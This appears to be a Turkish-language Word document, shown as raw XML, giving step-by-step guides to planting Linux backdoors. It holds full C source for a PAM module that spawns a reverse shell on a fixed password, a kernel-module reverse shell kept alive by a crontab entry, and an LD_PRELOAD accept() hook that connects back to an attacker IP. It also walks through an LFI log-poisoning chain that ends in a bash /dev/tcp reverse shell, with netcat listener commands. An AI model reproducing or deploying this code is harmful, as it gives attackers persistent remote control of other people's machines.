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F6461" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036">
      <w:pPr>
        <w:pStyle w:val="Balk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036">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FTP ve PAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EAB8A6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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w: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FTP ve PAM kullanarak Shell almaya çalışıyoruz. FTP doğrulama sistemini manipüle ederek belirlediğimiz şifreyi girince Shell geliyor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BAA938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Kurban makinede gerekli bağımlılıkları kurun.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FABF5C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vsftpd.conf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sayfasını açın en aşağı inin ve doğrulama sisteminin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pam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olduğundan emin olun. Aşağıdaki ayarları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vsftpd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indikten sonra düzenleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BE320" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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pam</w:t>
      </w:r>
      <w:proofErr w:type="gram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_service_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spell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      # /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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pam.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spell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dosyasını kullan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694E6AA" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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gramStart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listen</w:t>
      </w:r>
      <w:proofErr w:type="gram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=YES                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Standalone</w:t>
      </w:r>
      <w:proofErr w:type="spell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modda çalış</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961EFC3" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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gramStart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listen</w:t>
      </w:r>
      <w:proofErr w:type="gram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_ipv6=NO                    IPv6'yı kapat (IPv4 için)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37C3D0" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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anonymous</w:t>
      </w:r>
      <w:proofErr w:type="gram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_enable</w:t>
      </w:r>
      <w:proofErr w:type="spell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=NO               Anonim girişi engelle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FD056" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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local</w:t>
      </w:r>
      <w:proofErr w:type="gram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_enable</w:t>
      </w:r>
      <w:proofErr w:type="spell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=YES                  Yerel kullanıcılara izin ver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C861EA" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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write</w:t>
      </w:r>
      <w:proofErr w:type="gram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_enable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD70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=YES                Yazma izni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07610C5A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390F8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install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vsftpd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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D3D61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install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libpam0g-dev -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8906D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B9656F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touch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/var/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lib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pam.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F754A3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DC3D5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nano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/var/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lib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pam.c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23E6261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security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pam_modules.h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E50C5D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security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pam_ext.h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C3503F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unistd.h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EEA767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3CEF377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55F065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82A625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PAM_EXTERN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pam_sm_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authenticate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pam_handle_t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flags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argc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042CCD5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5CEF5D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retval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FB96A5B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320291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Kullanıcının girdiği parolayı al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549968E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retval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pam_get_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item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, PAM_AUTHTOK, (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*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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C59C22E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retval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PAM_SUCCESS ||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NULL) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B1FE6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PAM_AUTH_ERR;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20839572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308F68D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76BA5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Backdoor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parolası kontrolü ("12345")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E196C7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, "12345") == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3063BF31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fork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) == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAA953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//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Reverse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shell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komutunu çalıştır (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Bash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kullanarak)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C2838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execl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"/bin/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", "-c", "/bin/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bash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 &gt;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&amp; /dev/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tcp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/192.168.1.10/8888 0&gt;&amp;1", NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0FA4E9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_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exit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0); // Çocuk prosesi sonlandır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36842A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2793379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PAM_SUCCESS; // Başarılı giriş</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8783B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5E95004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PAM_AUTH_ERR; // Normal kimlik doğrulama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF8889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315DCDE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6F61B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PAM_EXTERN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pam_sm_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setcred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pam_handle_t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flags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argc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33DC5242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PAM_SUCCESS;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C8FC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233E0E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475561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A3602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Dosyanızı derleyin.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yapılandırma dosyaları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secırity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altında olmalı.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AD7497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gcc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fPIC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shared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-o /var/lib/pam_shelll.so /var/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lib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pam.c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lpam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="615EA164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25FAF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mv /var/lib/pam_shelll.so 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usr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lib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/x86_64-linux-gnu/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security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06FD74B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2AC60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chmod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644 /usr/lib/x86_64-linux-gnu/security/pam_shelll.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4BC54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D006D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En son yapmanız gereken ise oluşturduğumuz doğrulama sistemini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vsftpd’ye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eklemek.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28662D57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nano  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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pam.d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vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72E630FA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auth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sufficient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‘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’veya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sufficient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yerine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required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yazın’’    pam_shelll.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1E6E0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32E32F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Saldırgan kısmında yapılması gerekenler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25426AAD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lvnp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8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00033835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ftp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&lt;Kurban-makine&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168FF610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Gerekli şifreyi girin şifre yanlış dese bile devam ediniz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4F401" w14:textId="77777777" w:rsidR="00483AF8" w:rsidRPr="00FD7036" w:rsidRDefault="00483AF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41331CF1" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D2D2FF" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036">
      <w:pPr>
        <w:pStyle w:val="Balk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Toc196753824"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD7036">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.KO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23F54340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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: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Local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Kernel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Module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kullanarak Shell almaya çalışıyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321B416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Önemli bağımlılıkları indirin burada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make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kısmı önemli. C kodumuzu derlemek için onu kullanacağız.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F066E90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apt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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04CC3121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apt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install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make</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="288575EA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94AF5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nano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ko.c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8D4E47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#include &lt;linux/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module.h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600D940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#include &lt;linux/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kernel.h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99B55D3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#include &lt;linux/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init.h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73856DE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#include &lt;linux/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kthread.h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7696CF8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#include &lt;linux/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delay.h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2865CA2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#include &lt;linux/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kmod.h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79C741E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1F5E64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MODULE_LICENSE("GPL");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167504B6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MODULE_AUTHOR("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kesinlikleemre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2242808D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MODULE_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DESCRIPTION(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"Kernel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Reverse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Shell");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A712B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E4778D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reverse_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shell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DCB6305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A287F7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task_struct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thread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C46DDB4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B42D77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reverse_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shell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0C40F75D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] = {"/bin/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bash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", "-c", "/bin/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bash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i &gt;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&amp; /dev/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tcp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/192.168.1.10/5555 0&gt;&amp;1", NULL};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E690D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envp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{ "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HOME=/", "TERM=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xterm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", "PATH=/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sbin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:/bin:/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usr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sbin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:/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usr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/bin", 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NULL }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7F0EF63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1C96BD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kthread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_should_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stop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)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF881B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call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_usermodehelper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0],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envp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, UMH_WAIT_EXEC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A55D88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ssleep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60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07021B07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6D38F51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2E03F9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595B3083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A60EF41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C7460A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__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backdoor_init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ED6B4AA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printk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KERN_INFO "[+]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Backdoor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yüklendi!\\n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6DDDBF16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thread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kthread_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run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reverse_shell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, NULL, "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backdoor_thread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6EF8AD52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551E0638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BE16DAE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39962A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__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exit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backdoor_exit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64276BD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printk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KERN_INFO "[-]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Backdoor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kaldırıldı!\\n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7ED21450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thread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62313B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kthread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_stop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thread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E077B20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00B5A89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9D006E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module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_init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backdoor_init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8263A74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module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_exit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backdoor_exit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D9D3A5A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449BE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1DB699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2C461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648AF1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3317E4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86597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CE0A94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Bu kısımda “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Makefile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” dosyasının m harfinin büyük olmasına dikkat edin ve aşağıdaki adımları uygulayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E789680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nano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Makefile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33288F6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-m +=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ko.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="54BD24C0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37BC5A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041CA66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\$(MAKE) -C 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lib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modules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/\$(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shell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uname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r)/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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M=\$(PWD)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modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66FE6EB6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EA3D25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clean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A38860A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\$(MAKE) -C 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lib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modules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/\$(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shell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uname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r)/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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M=\$(PWD)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clean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="257B000E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DEB6E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Çıktıyı çalıştırmak için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insmod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kullanılması gerekiyor. Bunu otomatize etmek için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crontab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kullanın.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDCCB3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make</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3DA2E50A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insmod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home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/$(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whoami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)/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ko.ko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D398DB2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DB012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Bilgisayar her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reboot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edildiğine çalışması için aşağıyı uygulayın.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658642E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cron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_entry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reboot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sbin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insmod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home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/$(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whoami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)/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ko.ko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0807F0B0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   (</w:t>
      </w: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crontab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-l 2&gt;/dev/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grep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-v -F "$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cron_entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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" ;</w:t>
      </w:r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echo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"$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cron_entry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") | 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crontab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</w:p>
    <w:p w14:paraId="33A9375A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BD3FFF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Saldırgan kısmında yapılması gerekenler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D24B4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açıp bilgisayarın açılmasını beklemek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85EC07" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036">
      <w:pPr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proofErr w:type="gram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>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD7036">
        <w:rPr>
          <w:rStyle w:val="Balk2Char"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5555 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13846C2C" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D03B054" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73592362" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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AF5067" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09AC452E" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036">
      <w:pPr>
        <w:pStyle w:val="Balk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" w:name="_Toc196753822"/>
      <w:r w:rsidRPr="00FD7036">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Log </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7036">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Poisoning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30E6AD4F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70C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w: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Buradaki amacımız LFI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zaafiyeti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olan sitede Apache2 sunucusunun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Access.log’unu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zehirlemektir. Zehirleme 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ile birlikte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RCE çalıştırarak makineye sızmış oluyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C938100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Gerekli bağımlılıkları yükleyip apache2 sunucusu için LFI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zaafiyetli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sayfa oluşturuyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8938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Access.log silinip tekrar yaratılmasının sebebi ise izinler konusunda sıkıntı çıkarmasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D144B0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www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olarak aslında sistemde geziyoruz o yüzden bazı izinler sorun çıkarıyor bundan dolayı Access.log kısmına kadar dosya izinlerini komple açıyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545042F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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43BE364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install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apache2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libapache2-mod-php -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335D66D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70051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touch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/var/www/html/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admin.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B810A92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7F3F36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nano &gt;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 /var/www/html/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admin.php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CA8A89F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14:paraId="6D59C9D4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$file = $_GET['file'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0C3C7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($file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A836337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14:paraId="5D81F81D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186725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rm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rf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/var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939E4E2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touch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/var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EA84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59FD56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chmod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777 var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558B4C5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chmod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777 /var/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BABF4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chmod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777 /var/log/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA086EE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549C1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restart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apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB3D2B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65C1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Saldırgan kısmında yapılacaklar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19386E9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Access.log kısmına gidip gidemediğinizi kontrol edin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6AD0F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://&lt;HEDEF_IP&gt;/admin.php?file=../../../../var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659E002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Eğer gidebiliyor iseniz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curl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kullanarak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user-agent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üzerinden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kodunuzu gönderin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3721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curl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-A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curl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-A "&lt;?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(\$_GET['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'])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; ?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&gt;" http://&lt;HEDEF_IP&gt;/http://&lt;HEDEF_IP&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D7DA7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Eğer bunu çalıştırdıktan sonra Access.log kısmına erişemiyorsanız. Error.log kısmını kontrol edin muhtemelen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parser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hatası alıyorsunuz. Bazen düzgün gönderemeyebiliyor. Access.log kısmında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kodu şu şekil gözükebiliyor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617A5592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"&lt;?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(\$_GET[/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/])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; ?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&gt;" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D319D14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Opsiyonel olarak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ile denemeniz daha doğru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olabiilir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63D657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HEDEF_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822ABCA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"&lt;?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(\$_GET['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'])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; ?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525123D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Daha sonra yapılması gereken ise </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A398E4A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Hlk196768383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://&lt;HEDEF_IP&gt;/admin.php?file=</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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../../../../var/log/apache2/access.log&amp;cmd=id </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14AECF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Log kısmında www-daya görüyorsanız çalışıyordur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8313B0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Son olarak Shell almanız için yapmanız gerekenler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089734A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://&lt;HEDEF_IP&gt;/admin.php?file=/var/log/apache2/access.log&amp;cmd=bash+-c+'bash+-i+&gt;%26+/dev/tcp/&lt;SALDIRGAN-IP&gt;/&lt;PORT-NUM&gt;+0&gt;%261'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821F67E" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036">
      <w:pPr>
        <w:pStyle w:val="Balk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3" w:name="_Toc196753821"/>
      <w:r w:rsidRPr="00FD7036">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD7036">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Preload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79FA1EEE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70C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w: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SSH atılmaya çalışıldığında oluşturduğumuz .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dosyası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accept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yakalayarak Shell alır. Oluşturduğumuz dosyayı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ld.so.preload’a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kaydederek çalışmasını sağlarız.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B818487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Yapmanız gerekenler ilk başta gerekli bağımlılıkları yükleriz ve gereken c kodumuzu oluştururuz. Bunlar kurban makinede yapılacak olanlar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5F076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install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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA681EE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install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gcc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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D387F7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install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gcc-12 g++-12 -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5213ECEA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touch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/var/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lib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accept.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6174B335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0BEF2A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nano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/var/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lib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accept.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45E30236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#define _GNU_SOURCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8B74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4FCA4BF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unistd.h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48E776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6E47CE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#include &lt;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dlfcn.h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69948AB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sys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socket.h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185A748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netinet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in.h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F6F42D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#include &lt;arpa/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inet.h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A64B34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3DD3CD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accept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sockfd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sockaddr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addr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socklen_t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addrlen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2F33DBB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(*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real_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accept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)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sockaddr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*,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socklen_t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*) = NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28941C1B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07043C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real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_accept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093A5621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real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_accept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dlsym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RTLD_NEXT, "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accept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1E06EBC9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A902F8D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CEA2B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client_fd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real_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accept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sockfd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addr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addrlen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B306B6E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645D0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Shell sadece bir kere açılsın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00F0C9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shell_sent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14:paraId="12224004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FE89A2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shell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_sent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2DF2DDD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shell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_sent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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934B68D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4C235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socket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AF_INET, SOCK_STREAM, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F41AC4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sockaddr_in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attacker_addr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CB3B575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4524B2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attacker_addr.sin_family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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D7650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attacker_addr.sin_port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htons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9999); //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Netcat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dinleme portu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD0B6FF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attacker_addr.sin_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addr.s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_addr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inet_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addr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"192.168.1.10"); // Saldırgan IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11094FF9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4DB656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connect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, (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sockaddr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*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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attacker_addr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attacker_addr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)) == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958C189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dup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2(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0); //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stdin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D055266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dup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2(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1); //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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="503704A5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dup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2(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2); //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stderr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69BA15DD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execl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"/bin/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bash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bash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", "-i", NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E5BD04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2911459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C688A0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close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sock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5744A5A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9552BA6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7847AF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client_fd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862F03E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A77B7A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238C1F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55DD1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Bu kısımda oluşturulan .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dosyasını kaydedip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preload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kısmına ekleriz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D134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gcc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shared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fPIC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o  /</w:t>
      </w:r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var/lib/backdoor.so /var/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lib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accept.c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ldl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07F8C03E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3C843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echo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"/var/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lib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/backdoor.so" |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tee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ld.so.preload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F56A5F4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965F9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Saldırgan makinede yapılması gerekenler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139BD40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Netcat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açıp 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atın ve bekleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1E1824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lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spell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9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2090F964" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD70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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD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kurban-ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC42C6" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036" w:rsidP="00FD7036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6B6D9E" w14:textId="77777777" w:rsidR="00FD7036" w:rsidRPr="00FD7036" w:rsidRDefault="00FD7036">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FD7036" w:rsidRPr="00FD7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B77A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBBAC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E646A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBBACF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A7B83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBBAC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D750E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBBAC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028">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="330451482">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1946575498">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="572281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36"/>
    <w:rsid w:val="00483AF8"/>
    <w:rsid w:val="00972BB0"/>
    <w:rsid w:val="00A23A76"/>
    <w:rsid w:val="00BA6BFE"/>
    <w:rsid w:val="00F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A38C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FCE3B531-79F3-486F-9017-D0D18412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036"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
